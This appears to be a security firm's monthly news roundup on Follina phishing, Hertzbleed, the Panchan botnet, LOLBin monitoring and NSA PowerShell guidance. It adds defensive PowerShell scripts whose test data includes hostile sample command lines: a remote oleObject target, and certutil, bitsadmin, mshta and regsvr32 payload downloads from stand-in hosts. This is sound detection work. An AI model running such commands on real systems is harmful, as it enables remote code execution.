This month’s news was about new attack methods and a re-examination of an old assumption: that cryptographic keys are safe from attackers who cannot touch the hardware. This and more was on our minds this month. Read on for the articles our team has been discussing, featuring new, old, and unorthodox techniques.
Phishing Campaign That Uses Nuclear War as Bait
This article covers a phishing campaign by the notorious Russian cyber espionage group Fancy Bear, a.k.a. APT28. The lure is built on current events, and the payload abuses Follina, a Microsoft vulnerability disclosed in May (tracked as CVE-2022-30190) in the Microsoft Support Diagnostic Tool (MSDT). Follina was widely described as a one-click exploit because the victim only has to open the document. According to Threat Post, the bug affects current versions of Windows and Microsoft Office, which is what makes it especially dangerous.
In light of the war between Russia and Ukraine, Threat Post states that the campaign plays on fear of nuclear warfare to get users to download and open the document. Once opened, the document loads a remote HTML file; that file invokes the MSDT protocol handler, which executes attacker-supplied code and gives the attackers remote access to the machine.
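The document side of this chain leaves a recognizable trace: a .docx is a ZIP archive, and a Follina-style file carries an embedded-object relationship whose target is an external URL rather than a part inside the archive. The PowerShell below is an added triage check, not code from the Threat Post article or from any analysis of the campaign. It builds a constructed sample document inline (the relationship target and file names are made up for the demonstration) and then scans any .docx for external targets on relationship types that should never point outside the document, plus a few URL schemes that are dangerous on any relationship.

```powershell
# Added example: triage a .docx for the external embedded-object relationships that
# Follina-style documents use to pull a remote HTML payload. Not from the Threat Post
# article; the sample document below is constructed here for demonstration.
Add-Type -AssemblyName System.IO.Compression
Add-Type -AssemblyName System.IO.Compression.FileSystem

# Relationship types that have no business pointing outside the document.
# Ordinary hyperlinks are also "External" relationships, so they are deliberately
# NOT on this list; flagging them would bury real findings in false positives.
$SuspiciousRelTypes = @(
    'http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject',
    'http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate',
    'http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame'
)
# URL schemes worth flagging on any relationship, hyperlink or not.
$SuspiciousSchemes = '^(ms-msdt|mhtml|search-ms|ms-officecmd):'

function Get-ExternalRelationshipFindings {
    param([Parameter(Mandatory)][string]$Path)
    $findings = @()
    $zip = [System.IO.Compression.ZipFile]::OpenRead($Path)
    try {
        foreach ($entry in ($zip.Entries | Where-Object { $_.FullName -like '*.rels' })) {
            $reader = New-Object System.IO.StreamReader($entry.Open())
            try { [xml]$rels = $reader.ReadToEnd() } finally { $reader.Dispose() }
            foreach ($rel in $rels.Relationships.Relationship) {
                $isExternal = $rel.TargetMode -eq 'External'
                $badType    = $SuspiciousRelTypes -contains $rel.Type
                $badScheme  = $rel.Target -match $SuspiciousSchemes
                if (($isExternal -and $badType) -or $badScheme) {
                    $reason = if ($badScheme) { 'dangerous URL scheme' } else { 'external target on an embedded-object relationship' }
                    $findings += [pscustomobject]@{
                        Part   = $entry.FullName
                        Type   = ($rel.Type -split '/')[-1]
                        Target = $rel.Target
                        Reason = $reason
                    }
                }
            }
        }
    } finally { $zip.Dispose() }
    return $findings
}

# Constructed sample: a minimal .docx whose document.xml.rels has one harmless
# hyperlink and one oleObject relationship with an external HTTP target.
function New-SampleDocx {
    param([Parameter(Mandatory)][string]$Path)
    $rels = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>' +
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">' +
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com/" TargetMode="External"/>' +
        '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://attacker.example/stage.html!" TargetMode="External"/>' +
        '</Relationships>'
    $parts = [ordered]@{
        'word/document.xml'            = '<?xml version="1.0" encoding="UTF-8"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body/></w:document>'
        'word/_rels/document.xml.rels' = $rels
    }
    if (Test-Path $Path) { Remove-Item $Path }
    $zip = [System.IO.Compression.ZipFile]::Open($Path, [System.IO.Compression.ZipArchiveMode]::Create)
    try {
        foreach ($name in $parts.Keys) {
            $writer = New-Object System.IO.StreamWriter($zip.CreateEntry($name).Open())
            try { $writer.Write($parts[$name]) } finally { $writer.Dispose() }
        }
    } finally { $zip.Dispose() }
}

$sample = Join-Path ([System.IO.Path]::GetTempPath()) 'constructed-sample.docx'
New-SampleDocx -Path $sample
Get-ExternalRelationshipFindings -Path $sample | Format-Table -AutoSize
```

Only the oleObject relationship is reported; the hyperlink is ignored on purpose, since external hyperlinks are normal in legitimate documents. Point the scanner at a quarantine folder with `Get-ChildItem *.docx | ForEach-Object { Get-ExternalRelationshipFindings -Path $_.FullName }` to triage a batch. A hit is a reason to look closer, not proof of malice: some document-automation products legitimately link external templates.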
“This latest tactic by the infamous APT group Fancy Bear highlights two important but basic facts when it comes to cybersecurity. Humans are still one of the weakest links in a security plan: by simply targeting users’ interests, fears, etc., phishing attacks are successful. Organizations not only need to strengthen their email security (among other aspects of their architecture) but also their cybersecurity enablement/training program for employees so they are educated on such attacks. Also, regular vulnerability scanning and, even more importantly, patching are needed. Sadly, most security and IT teams within an organization, due to increased workload and reduced staff, do not care for this important security measure in a timely and consistent manner.” — Shunta Sanders, Head of Solutions Architecture – North America
Source: Threat Post, June 23
Turning Power Side-Channel Attacks Into Remote Timing Attacks on x86
This article describes a new family of side-channel attacks. Hertzbleed exploits dynamic frequency scaling: a modern processor adjusts its clock frequency according to the power it draws, and because power draw depends on the data being processed, data-dependent frequency changes show up as differences in execution time. That turns a power side channel, which normally requires physical access to the machine, into a timing attack that can be carried out remotely, and the researchers used it to extract cryptographic keys from code written to run in constant time. The attack affects x86 processors from both Intel and AMD.
The research includes experimental evidence and the code used to reproduce the attack. On mitigation, the authors conclude that there is no convenient fix. The one workaround they describe is disabling frequency boost (Turbo Boost on Intel, Turbo Core or Precision Boost on AMD) so that the clock speed no longer varies with power draw, since it is those data-dependent frequency changes that leak the key; the price is a significant system-wide performance hit.
“Following a long list of side-channel attacks discovered in recent years, such as Spectre and Meltdown, this attack shows once again that creating high-performance and secure CPUs is a problem that has not been solved. Until it is, we will need to continue applying workarounds on top of our software to try to partially cover these holes, but I am unsure if this will continue to be sustainable in the future.” — Jon, Systems Programmer
Source: Hertzbleed Attack, June 14
Linux Botnet Has Found a Novel Way of Spreading
This post details how Akamai discovered Panchan, a new peer-to-peer Linux botnet. Panchan harvests SSH keys from the hosts it compromises and uses them to spread to other machines on the network, then puts the infected Linux servers to work mining cryptocurrency while taking steps to avoid detection. The botnet is written in Go, a language designed at Google. The article outlines why it has been so successful, including its two ways into a network: SSH keys stolen from already-compromised hosts, and weak SSH passwords.
“Even if the attack is pretty simple, the fact that they are collecting and using stolen SSH certificates instead of using the good old dictionary attacks in an automated way is interesting.” — Fernando, Founder
Source: ZDNet, June 16
Monitoring Commonly Abused Windows Utilities
This article from Wazuh shows how to use the Wazuh platform to monitor commonly abused Windows utilities. Wazuh collects and analyzes endpoint telemetry to understand what is happening on the monitored endpoints and to detect abuse by malicious actors. The article covers the system requirements for an effective deployment, with detailed, step-by-step instructions for setting up the components needed to analyze and detect this activity. It also demonstrates how to set up alerts so that administrators are notified when suspicious activity is observed. Handy screenshots show the configuration and the detection rules, helping administrators better monitor their systems.
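The core of this kind of monitoring is matching process command lines against the ways legitimate Windows binaries get misused. The PowerShell below is an added example, not the Wazuh post’s rules or configuration: it applies a small rule set to process command lines and tags each hit with its MITRE ATT&CK technique ID. The rule set is my own selection of frequently abused utilities and is not necessarily the set the Wazuh post covers; the sample command lines are constructed here, with 203.0.113.5 as a documentation-range address.

```powershell
# Added example (not from the Wazuh post): pattern-match process command lines for
# a handful of commonly abused Windows utilities ("LOLBins") and tag each hit with
# its MITRE ATT&CK technique. The sample command lines are constructed here.
# PowerShell's -match is case-insensitive by default, so the patterns omit (?i).
$LolbinRules = @(
    @{ Name = 'certutil download';      Technique = 'T1105';     Pattern = '\bcertutil(\.exe)?\b.*-urlcache\b.*https?://' }
    @{ Name = 'certutil decode';        Technique = 'T1140';     Pattern = '\bcertutil(\.exe)?\b.*-decode\b' }
    @{ Name = 'mshta remote/inline';    Technique = 'T1218.005'; Pattern = '\bmshta(\.exe)?\b.*(https?://|javascript:|vbscript:)' }
    @{ Name = 'regsvr32 scriptlet';     Technique = 'T1218.010'; Pattern = '\bregsvr32(\.exe)?\b.*(/i:https?://|scrobj\.dll)' }
    @{ Name = 'rundll32 script';        Technique = 'T1218.011'; Pattern = '\brundll32(\.exe)?\b.*(javascript:|vbscript:)' }
    @{ Name = 'bitsadmin transfer';     Technique = 'T1197';     Pattern = '\bbitsadmin(\.exe)?\b.*/transfer\b' }
    @{ Name = 'wmic process create';    Technique = 'T1047';     Pattern = '\bwmic(\.exe)?\b.*process\s+call\s+create' }
    @{ Name = 'msiexec remote package'; Technique = 'T1218.007'; Pattern = '\bmsiexec(\.exe)?\b.*/i\s+https?://' }
)

# Returns the first matching rule as an object, or $null when the line is clean.
function Test-LolbinAbuse {
    param([Parameter(Mandatory)][string]$CommandLine)
    foreach ($rule in $LolbinRules) {
        if ($CommandLine -match $rule.Pattern) {
            return [pscustomobject]@{
                Technique   = $rule.Technique
                Rule        = $rule.Name
                CommandLine = $CommandLine
            }
        }
    }
    return $null
}

function Get-LolbinFindings {
    param([Parameter(Mandatory)][string[]]$CommandLines)
    foreach ($cl in $CommandLines) {
        $hit = Test-LolbinAbuse -CommandLine $cl
        if ($hit) { $hit }
    }
}

# Constructed sample: six abusive command lines and two benign ones that must not fire.
$SampleCommandLines = @(
    'certutil.exe -urlcache -split -f http://203.0.113.5/tools.zip C:\Users\Public\t.zip',
    'mshta.exe http://203.0.113.5/launch.hta',
    'regsvr32.exe /s /n /u /i:http://203.0.113.5/s.sct scrobj.dll',
    'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();',
    'bitsadmin.exe /transfer job /download /priority high http://203.0.113.5/p.exe C:\Users\Public\p.exe',
    'wmic.exe process call create "cmd.exe /c whoami"',
    '"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\alice\Documents\q3.docx"',
    'certutil.exe -hashfile C:\Users\alice\Downloads\installer.msi SHA256'
)

Get-LolbinFindings -CommandLines $SampleCommandLines | Format-Table Technique, Rule, CommandLine -AutoSize

# On a live host, feed Security event 4688 instead. Requires the audit policy
# "Include command line in process creation events"; the command line is Properties[8].
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents 500 |
#     ForEach-Object { Test-LolbinAbuse -CommandLine ([string]$_.Properties[8].Value) } |
#     Where-Object { $_ }
```

The two benign lines (a normal Word launch and `certutil -hashfile`) illustrate why the rules key on the abusive arguments rather than on the binary name alone: certutil, rundll32 and the rest run constantly on a healthy system, and alerting on their mere presence is unworkable. Rules like these belong in the SIEM, where Wazuh’s decoders and rules do the same job over agent-collected events, but a stand-alone matcher is useful for testing a rule idea against a few captured command lines first.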
“In order to improve our intelligence and deception platform, one of the threat intelligence tasks is to track the evolution of threat actors: their procedures and techniques. One common activity is the use of legitimate software to hide or run malicious activities. You can find some examples of this activity and their corresponding MITRE Technique in this entry.” — Juan de la Fuente, Threat Intelligence Analyst
Source: Wazuh, June 9
NSA Shares Tips on Securing Windows Devices with PowerShell
The US National Security Agency (NSA) shares a number of tips on how to use Windows PowerShell to add an extra layer of security to systems. Many system administrators have long believed that PowerShell helps attackers more than it helps defenders, and have often blocked it outright. The NSA concludes that blocking PowerShell hinders the defensive capabilities that current versions of PowerShell provide and prevents components of the Windows operating system from working properly. Instead, it encourages organizations to run updated versions of PowerShell and to turn on the features that help defenders detect and counter abuse.
Most of the measures in the article are already built into PowerShell and the operating system and only need to be enabled, which can itself be done from PowerShell. They range from logging and script execution controls to securing remote PowerShell connections. Because these layers of security ship with the operating system, they add protection against potential attacks without adding to the budget.
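Turning on the logging that makes PowerShell a defender’s asset is a handful of policy settings. The PowerShell below is an added example, not code from the NSA guidance or from the BleepingComputer article: it writes the registry values that correspond to the Group Policy settings for script block logging, module logging and transcription (the logging features the guidance recommends enabling), reads the state back, and confirms that script block events actually appear in the event log. The transcript directory is an assumed path; it must be run elevated, and in a domain the same settings would normally be delivered by GPO rather than set per host.

```powershell
# Added example (not from the NSA paper or the BleepingComputer article): enable the
# PowerShell logging features defenders rely on, read the settings back, and verify
# that script block events are being recorded. Run from an elevated session.
$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Set-PolicyValue {
    param([string]$SubKey, [string]$Name, $Value, [string]$Type = 'DWord')
    $key = Join-Path $PolicyRoot $SubKey
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    New-ItemProperty -Path $key -Name $Name -Value $Value -PropertyType $Type -Force | Out-Null
}

function Enable-PowerShellLogging {
    # Assumed path; in production this should be a write-only share that is collected centrally.
    param([string]$TranscriptDir = 'C:\PSTranscripts')

    # Deep script block logging: every script block, de-obfuscated, as event 4104
    # in Microsoft-Windows-PowerShell/Operational.
    Set-PolicyValue -SubKey 'ScriptBlockLogging' -Name 'EnableScriptBlockLogging' -Value 1

    # Module logging for all modules ('*'): pipeline execution details as event 4103.
    Set-PolicyValue -SubKey 'ModuleLogging' -Name 'EnableModuleLogging' -Value 1
    Set-PolicyValue -SubKey 'ModuleLogging\ModuleNames' -Name '*' -Value '*' -Type 'String'

    # Over-the-shoulder transcription of every session, with a header per command.
    Set-PolicyValue -SubKey 'Transcription' -Name 'EnableTranscripting' -Value 1
    Set-PolicyValue -SubKey 'Transcription' -Name 'EnableInvocationHeader' -Value 1
    Set-PolicyValue -SubKey 'Transcription' -Name 'OutputDirectory' -Value $TranscriptDir -Type 'String'
}

function Get-PowerShellLoggingStatus {
    [pscustomobject]@{
        Version             = $PSVersionTable.PSVersion.ToString()
        # ConstrainedLanguage is the hardened state; it is enforced via AppLocker/WDAC, not set here.
        LanguageMode        = $ExecutionContext.SessionState.LanguageMode
        ScriptBlockLogging  = (Get-ItemProperty -Path (Join-Path $PolicyRoot 'ScriptBlockLogging') -ErrorAction SilentlyContinue).EnableScriptBlockLogging
        ModuleLogging       = (Get-ItemProperty -Path (Join-Path $PolicyRoot 'ModuleLogging') -ErrorAction SilentlyContinue).EnableModuleLogging
        Transcription       = (Get-ItemProperty -Path (Join-Path $PolicyRoot 'Transcription') -ErrorAction SilentlyContinue).EnableTranscripting
        # Windows PowerShell 2.0 predates all of this logging; 'Enabled' here means attackers can downgrade to it.
        PowerShellV2Present = (Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -ErrorAction SilentlyContinue).State
    }
}

Enable-PowerShellLogging
Get-PowerShellLoggingStatus | Format-List

# Generate one script block and confirm it lands in the event log as event 4104.
Invoke-Expression 'Write-Output "logging-check"'
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents 3 |
    Select-Object TimeCreated, @{ Name = 'ScriptBlock'; Expression = { $_.Properties[2].Value } }
```

The status check is the part worth keeping around: `LanguageMode` and `PowerShellV2Present` show the two gaps this script does not close on its own. Constrained language mode has to be enforced through an application control policy (AppLocker or WDAC), and the legacy 2.0 engine, which logs none of this, should be removed with `Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root` where nothing still depends on it. Script block logs are only useful if they leave the host, so forward the Microsoft-Windows-PowerShell/Operational log to the SIEM along with the transcripts.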
“Historically, PowerShell has caused a lot of headaches for system administrators as it gave attackers a lot of tools they can take advantage of. Nowadays, PowerShell is much more mature, and it also provides great tools to assist defenders in countering abuse. Until now, defenders have typically disabled PowerShell in order to prevent attackers from abusing it, but, nowadays, doing so causes more harm than good. We all know that “unlearning” things (i.e., bad practices) is hard, but it’s worth it!” — Fernando, Founder
Source: BleepingComputer, June 22
Don’t miss next month’s roundup. Follow us on LinkedIn, Twitter, or sign up for our newsletter to stay in touch.